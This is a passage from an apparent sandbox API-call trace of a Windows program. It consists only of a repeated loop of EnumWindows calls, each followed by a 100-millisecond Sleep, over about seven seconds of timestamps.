lParam=0x2830000) [0292.280] Sleep (dwMilliseconds=0x64) [0292.320] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.320] Sleep (dwMilliseconds=0x64) [0292.358] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.359] Sleep (dwMilliseconds=0x64) [0292.394] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.394] Sleep (dwMilliseconds=0x64) [0292.399] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.399] Sleep (dwMilliseconds=0x64) [0292.442] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.442] Sleep (dwMilliseconds=0x64) [0292.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.481] Sleep (dwMilliseconds=0x64) [0292.522] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.522] Sleep (dwMilliseconds=0x64) [0292.562] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.562] Sleep (dwMilliseconds=0x64) [0292.598] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.599] Sleep (dwMilliseconds=0x64) [0292.642] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.643] Sleep (dwMilliseconds=0x64) [0292.679] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.680] Sleep (dwMilliseconds=0x64) [0292.758] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.758] Sleep (dwMilliseconds=0x64) [0292.777] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.777] Sleep (dwMilliseconds=0x64) [0292.798] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.798] Sleep (dwMilliseconds=0x64) [0292.836] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.836] Sleep (dwMilliseconds=0x64) [0292.875] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.876] Sleep (dwMilliseconds=0x64) [0292.913] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.913] Sleep (dwMilliseconds=0x64) [0292.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.924] Sleep (dwMilliseconds=0x64) [0292.952] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.953] Sleep (dwMilliseconds=0x64) [0292.990] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.991] Sleep (dwMilliseconds=0x64) [0293.012] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.012] Sleep (dwMilliseconds=0x64) [0293.030] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.030] Sleep (dwMilliseconds=0x64) [0293.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.092] Sleep (dwMilliseconds=0x64) [0293.160] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.161] Sleep (dwMilliseconds=0x64) [0293.172] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.173] Sleep (dwMilliseconds=0x64) [0293.233] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.234] Sleep (dwMilliseconds=0x64) [0293.272] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.272] Sleep (dwMilliseconds=0x64) [0293.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.296] Sleep (dwMilliseconds=0x64) [0293.312] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.313] Sleep (dwMilliseconds=0x64) [0293.349] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.349] Sleep (dwMilliseconds=0x64) [0293.387] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.387] Sleep (dwMilliseconds=0x64) [0293.388] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.389] Sleep (dwMilliseconds=0x64) [0293.426] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.426] Sleep (dwMilliseconds=0x64) [0293.467] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.468] Sleep (dwMilliseconds=0x64) [0293.496] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.496] Sleep (dwMilliseconds=0x64) [0293.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.507] Sleep (dwMilliseconds=0x64) [0293.546] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.546] Sleep (dwMilliseconds=0x64) [0293.586] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.586] Sleep (dwMilliseconds=0x64) [0293.609] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.610] Sleep (dwMilliseconds=0x64) [0293.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.627] Sleep (dwMilliseconds=0x64) [0293.666] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.666] Sleep (dwMilliseconds=0x64) [0293.704] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.705] Sleep (dwMilliseconds=0x64) [0293.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.727] Sleep (dwMilliseconds=0x64) [0293.769] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.770] Sleep (dwMilliseconds=0x64) [0293.811] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.812] Sleep (dwMilliseconds=0x64) [0293.850] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.850] Sleep (dwMilliseconds=0x64) [0293.860] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.860] Sleep (dwMilliseconds=0x64) [0293.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.890] Sleep (dwMilliseconds=0x64) [0293.928] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.929] Sleep (dwMilliseconds=0x64) [0293.956] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.957] Sleep (dwMilliseconds=0x64) [0293.968] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0293.968] Sleep (dwMilliseconds=0x64) [0294.005] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.006] Sleep (dwMilliseconds=0x64) [0294.043] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.044] Sleep (dwMilliseconds=0x64) [0294.052] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.052] Sleep (dwMilliseconds=0x64) [0294.089] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.089] Sleep (dwMilliseconds=0x64) [0294.127] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.127] Sleep (dwMilliseconds=0x64) [0294.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.166] Sleep (dwMilliseconds=0x64) [0294.169] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.169] Sleep (dwMilliseconds=0x64) [0294.234] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.234] Sleep (dwMilliseconds=0x64) [0294.276] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.276] Sleep (dwMilliseconds=0x64) [0294.289] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.289] Sleep (dwMilliseconds=0x64) [0294.318] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.318] Sleep (dwMilliseconds=0x64) [0294.354] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.355] Sleep (dwMilliseconds=0x64) [0294.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.381] Sleep (dwMilliseconds=0x64) [0294.394] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.394] Sleep (dwMilliseconds=0x64) [0294.431] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.432] Sleep (dwMilliseconds=0x64) [0294.467] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.467] Sleep (dwMilliseconds=0x64) [0294.471] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.471] Sleep (dwMilliseconds=0x64) [0294.508] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.509] Sleep (dwMilliseconds=0x64) [0294.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.547] Sleep (dwMilliseconds=0x64) [0294.554] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.555] Sleep (dwMilliseconds=0x64) [0294.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.588] Sleep (dwMilliseconds=0x64) [0294.625] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.626] Sleep (dwMilliseconds=0x64) [0294.675] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.675] Sleep (dwMilliseconds=0x64) [0294.677] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.678] Sleep (dwMilliseconds=0x64) [0294.702] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.703] Sleep (dwMilliseconds=0x64) [0294.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.740] Sleep (dwMilliseconds=0x64) [0294.772] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.772] Sleep (dwMilliseconds=0x64) [0294.784] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.785] Sleep (dwMilliseconds=0x64) [0294.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.821] Sleep (dwMilliseconds=0x64) [0294.859] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.859] Sleep (dwMilliseconds=0x64) [0294.866] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.867] Sleep (dwMilliseconds=0x64) [0294.899] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.899] Sleep (dwMilliseconds=0x64) [0294.938] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.939] Sleep (dwMilliseconds=0x64) [0294.963] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.964] Sleep (dwMilliseconds=0x64) [0294.978] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0294.978] Sleep (dwMilliseconds=0x64) [0295.136] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.136] Sleep (dwMilliseconds=0x64) [0295.168] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.169] Sleep (dwMilliseconds=0x64) [0295.174] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.174] Sleep (dwMilliseconds=0x64) [0295.235] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.235] Sleep (dwMilliseconds=0x64) [0295.293] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.294] Sleep (dwMilliseconds=0x64) [0295.298] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.298] Sleep (dwMilliseconds=0x64) [0295.336] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.337] Sleep (dwMilliseconds=0x64) [0295.373] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.374] Sleep (dwMilliseconds=0x64) [0295.416] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.417] Sleep (dwMilliseconds=0x64) [0295.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.419] Sleep (dwMilliseconds=0x64) [0295.456] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.457] Sleep (dwMilliseconds=0x64) [0295.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.497] Sleep (dwMilliseconds=0x64) [0295.529] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.530] Sleep (dwMilliseconds=0x64) [0295.538] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.539] Sleep (dwMilliseconds=0x64) [0295.575] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.576] Sleep (dwMilliseconds=0x64) [0295.612] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.613] Sleep (dwMilliseconds=0x64) [0295.631] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.632] Sleep (dwMilliseconds=0x64) [0295.650] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.651] Sleep (dwMilliseconds=0x64) [0295.686] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.687] Sleep (dwMilliseconds=0x64) [0295.715] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.715] Sleep (dwMilliseconds=0x64) [0295.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.729] Sleep (dwMilliseconds=0x64) [0295.765] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.765] Sleep (dwMilliseconds=0x64) [0295.812] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.812] Sleep (dwMilliseconds=0x64) [0295.821] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.822] Sleep (dwMilliseconds=0x64) [0295.852] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.853] Sleep (dwMilliseconds=0x64) [0295.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.890] Sleep (dwMilliseconds=0x64) [0295.915] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.915] Sleep (dwMilliseconds=0x64) [0295.933] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.933] Sleep (dwMilliseconds=0x64) [0295.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0295.971] Sleep (dwMilliseconds=0x64) [0296.011] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.012] Sleep (dwMilliseconds=0x64) [0296.023] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.023] Sleep (dwMilliseconds=0x64) [0296.054] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.062] Sleep (dwMilliseconds=0x64) [0296.099] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.100] Sleep (dwMilliseconds=0x64) [0296.135] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.136] Sleep (dwMilliseconds=0x64) [0296.142] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.142] Sleep (dwMilliseconds=0x64) [0296.235] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.236] Sleep (dwMilliseconds=0x64) [0296.274] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.274] Sleep (dwMilliseconds=0x64) [0296.295] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.296] Sleep (dwMilliseconds=0x64) [0296.316] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.316] Sleep (dwMilliseconds=0x64) [0296.355] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.356] Sleep (dwMilliseconds=0x64) [0296.393] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.394] Sleep (dwMilliseconds=0x64) [0296.396] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.397] Sleep (dwMilliseconds=0x64) [0296.431] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.431] Sleep (dwMilliseconds=0x64) [0296.469] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.469] Sleep (dwMilliseconds=0x64) [0296.494] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.494] Sleep (dwMilliseconds=0x64) [0296.508] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.509] Sleep (dwMilliseconds=0x64) [0296.549] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.549] Sleep (dwMilliseconds=0x64) [0296.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.587] Sleep (dwMilliseconds=0x64) [0296.602] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.603] Sleep (dwMilliseconds=0x64) [0296.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.626] Sleep (dwMilliseconds=0x64) [0296.663] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.664] Sleep (dwMilliseconds=0x64) [0296.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.701] Sleep (dwMilliseconds=0x64) [0296.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.706] Sleep (dwMilliseconds=0x64) [0296.738] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.738] Sleep (dwMilliseconds=0x64) [0296.777] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.778] Sleep (dwMilliseconds=0x64) [0296.804] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.805] Sleep (dwMilliseconds=0x64) [0296.823] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.823] Sleep (dwMilliseconds=0x64) [0296.859] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.860] Sleep (dwMilliseconds=0x64) [0296.898] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.898] Sleep (dwMilliseconds=0x64) [0296.909] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.910] Sleep (dwMilliseconds=0x64) [0296.936] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.937] Sleep (dwMilliseconds=0x64) [0296.976] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0296.977] Sleep (dwMilliseconds=0x64) [0297.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.014] Sleep (dwMilliseconds=0x64) [0297.052] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.052] Sleep (dwMilliseconds=0x64) [0297.099] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.100] Sleep (dwMilliseconds=0x64) [0297.122] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.123] Sleep (dwMilliseconds=0x64) [0297.141] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.141] Sleep (dwMilliseconds=0x64) [0297.177] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.178] Sleep (dwMilliseconds=0x64) [0297.237] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.238] Sleep (dwMilliseconds=0x64) [0297.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.250] Sleep (dwMilliseconds=0x64) [0297.278] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.281] Sleep (dwMilliseconds=0x64) [0297.318] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.319] Sleep (dwMilliseconds=0x64) [0297.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.353] Sleep (dwMilliseconds=0x64) [0297.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.357] Sleep (dwMilliseconds=0x64) [0297.412] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.413] Sleep (dwMilliseconds=0x64) [0297.453] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.454] Sleep (dwMilliseconds=0x64) [0297.477] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.477] Sleep (dwMilliseconds=0x64) [0297.493] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.494] Sleep (dwMilliseconds=0x64) [0297.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.531] Sleep (dwMilliseconds=0x64) [0297.562] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.563] Sleep (dwMilliseconds=0x64) [0297.568] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.569] Sleep (dwMilliseconds=0x64) [0297.605] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.605] Sleep (dwMilliseconds=0x64) [0297.642] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.642] Sleep (dwMilliseconds=0x64) [0297.647] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.648] Sleep (dwMilliseconds=0x64) [0297.680] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.681] Sleep (dwMilliseconds=0x64) [0297.721] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.721] Sleep (dwMilliseconds=0x64) [0297.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.741] Sleep (dwMilliseconds=0x64) [0297.765] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.765] Sleep (dwMilliseconds=0x64) [0297.800] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.801] Sleep (dwMilliseconds=0x64) [0297.828] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.829] Sleep (dwMilliseconds=0x64) [0297.854] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.855] Sleep (dwMilliseconds=0x64) [0297.893] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.894] Sleep (dwMilliseconds=0x64) [0297.932] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.932] Sleep (dwMilliseconds=0x64) [0297.935] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.936] Sleep (dwMilliseconds=0x64) [0297.974] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0297.978] Sleep (dwMilliseconds=0x64) [0298.033] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.033] Sleep (dwMilliseconds=0x64) [0298.065] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.066] Sleep (dwMilliseconds=0x64) [0298.086] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.086] Sleep (dwMilliseconds=0x64) [0298.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.123] Sleep (dwMilliseconds=0x64) [0298.152] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.153] Sleep (dwMilliseconds=0x64) [0298.165] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.166] Sleep (dwMilliseconds=0x64) [0298.223] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.223] Sleep (dwMilliseconds=0x64) [0298.260] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.261] Sleep (dwMilliseconds=0x64) [0298.269] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.269] Sleep (dwMilliseconds=0x64) [0298.298] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.298] Sleep (dwMilliseconds=0x64) [0298.338] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.339] Sleep (dwMilliseconds=0x64) [0298.355] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.356] Sleep (dwMilliseconds=0x64) [0298.376] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.377] Sleep (dwMilliseconds=0x64) [0298.413] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.413] Sleep (dwMilliseconds=0x64) [0298.458] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.459] Sleep (dwMilliseconds=0x64) [0298.461] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.461] Sleep (dwMilliseconds=0x64) [0298.499] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.499] Sleep (dwMilliseconds=0x64) [0298.541] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.542] Sleep (dwMilliseconds=0x64) [0298.564] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.564] Sleep (dwMilliseconds=0x64) [0298.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.590] Sleep (dwMilliseconds=0x64) [0298.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.627] Sleep (dwMilliseconds=0x64) [0298.663] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.663] Sleep (dwMilliseconds=0x64) [0298.667] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.667] Sleep (dwMilliseconds=0x64) [0298.702] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.703] Sleep (dwMilliseconds=0x64) [0298.741] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.741] Sleep (dwMilliseconds=0x64) [0298.750] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.751] Sleep (dwMilliseconds=0x64) [0298.779] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.780] Sleep (dwMilliseconds=0x64) [0298.819] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.819] Sleep (dwMilliseconds=0x64) [0298.839] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.839] Sleep (dwMilliseconds=0x64) [0298.862] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.863] Sleep (dwMilliseconds=0x64) [0298.899] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.900] Sleep (dwMilliseconds=0x64) [0298.925] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.926] Sleep (dwMilliseconds=0x64) [0298.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.939] Sleep (dwMilliseconds=0x64) [0298.976] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0298.977] Sleep (dwMilliseconds=0x64) [0299.010] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.010] Sleep (dwMilliseconds=0x64) [0299.014] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.015] Sleep (dwMilliseconds=0x64) [0299.054] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.054] Sleep (dwMilliseconds=0x64) [0299.102] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.102] Sleep (dwMilliseconds=0x64) [0299.140] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.141] Sleep (dwMilliseconds=0x64) [0299.164] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.165] Sleep (dwMilliseconds=0x64) [0299.224] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.226] Sleep (dwMilliseconds=0x64) [0299.257] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.257] Sleep (dwMilliseconds=0x64) [0299.264] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.265] Sleep (dwMilliseconds=0x64) [0299.303] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.303] Sleep (dwMilliseconds=0x64) [0299.345] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.346] Sleep (dwMilliseconds=0x64) [0299.362] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.363] Sleep (dwMilliseconds=0x64) [0299.401] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.401] Sleep (dwMilliseconds=0x64) [0299.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.439] Sleep (dwMilliseconds=0x64) [0299.467] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.467] Sleep (dwMilliseconds=0x64) [0299.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.480] Sleep (dwMilliseconds=0x64) [0299.516] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.516] Sleep (dwMilliseconds=0x64) [0299.552] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.552] Sleep (dwMilliseconds=0x64) [0299.554] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.555] Sleep 